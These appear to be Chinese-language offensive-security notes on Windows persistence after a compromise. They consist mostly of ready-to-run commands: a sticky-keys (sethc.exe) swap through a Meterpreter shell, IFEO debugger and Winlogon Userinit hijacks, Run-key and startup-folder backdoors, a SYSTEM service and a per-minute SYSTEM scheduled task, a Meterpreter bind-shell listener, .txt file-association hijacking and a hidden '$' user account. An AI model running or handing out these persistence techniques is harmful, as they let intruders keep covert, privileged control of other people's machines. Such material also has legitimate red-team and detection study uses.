Windows权限维持

1.辅助功能镜像劫持

登录前可以使用的功能：

屏幕键盘c:\windows\system32\osk.exe、放大镜c:\windows\system32\Mageify.exe、粘滞键c:\windows\system32\sethc.exe(5次shift键)

MSF，开启3389->解决乱码问题->修改粘滞键原名->移入后门

meterpreter > run post/windows/manage/enable_rdp
meterpreter > shell
C:\Windows\system32>chcp 65001
C:\Windows\system32>ren c:\windows\system32\sethc.exe sethc1.exe
C:\Windows\system32>copy c:\Users\leiyneko\Desktop\shell.exe c:\windows\system32\sethc.exe

rdesktop IP:3389，Linux工具连接远程桌面，5次shift

2.IFEO映像劫持

运行程序时，系统会查IFEO注册表，如果存在debugger键值，会执行debugger数据里路径的程序

程序在注册表(regedit.exe)中的位置，HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

将后门加入(/t 字符串类型)，打开IE浏览器触发

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe" /v "debugger" /t REG_SZ /d "c:\Users\leiyneko\Desktop\shell.exe"

3.启动项

目录启动项(放入后门)

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\

注册表启动项

不需要管理员权限(用什么用户加后门，打的就是什么用户)

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

需要管理员权限

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

加入后门，重启触发

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "cmd" /t REG_SZ /d "c:\Users\leiyneko\Desktop\shell.exe"

 4.服务

添加system权限服务(用cmd打开后门不容易闪退，加入启动项)

sc create mysql2008 binpath="cmd.exe /k c:\Users\leiyneko\Desktop\shell.exe"  start="auto" obj="localsystem"
sc start mysql2008

MSF模块(可能不好用)

建服务

meterpreter > run metsvc

监听

msf6 exploit(multi/handler) > set payload windows/metsvc_bind_tcp
msf6 exploit(multi/handler) > set RHOST IP
msf6 exploit(multi/handler) > set LPORT 31337
msf6 exploit(multi/handler) > run

5.计划任务

创建system权限计划任务(一分钟执行一次)：

schtasks /create /ru system /sc minute /mo 1 /tn "mysqlstart" /tr c:\s.exe

6.winlogon用户初始化

winlogon.exe是登录前就有的重要进程，负责将用户配置文件加载到注册表

在原来基础上加入后门，如果没有userinit.exe会无法登录

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /f
reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\userinit.exe,c:\Users\leiyneko\Desktop\shell.exe," /f

7.文件关联

查看后缀指向的文件类型

C:\Users\ly>assoc .txt
.txt=txtfile

文件类型在注册表(regedit.exe)中的位置，HKEY_CLASSES_ROOT

将txtfile对应的程序改为后门(/ve是默认和类型在注册表看)

reg add "HKEY_CLASSES_ROOT\txtfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\Users\leiyneko\Desktop\shell.exe %1" /f

8.影子用户

创建比较隐蔽的影子用户

net user hacker$ 123456 /add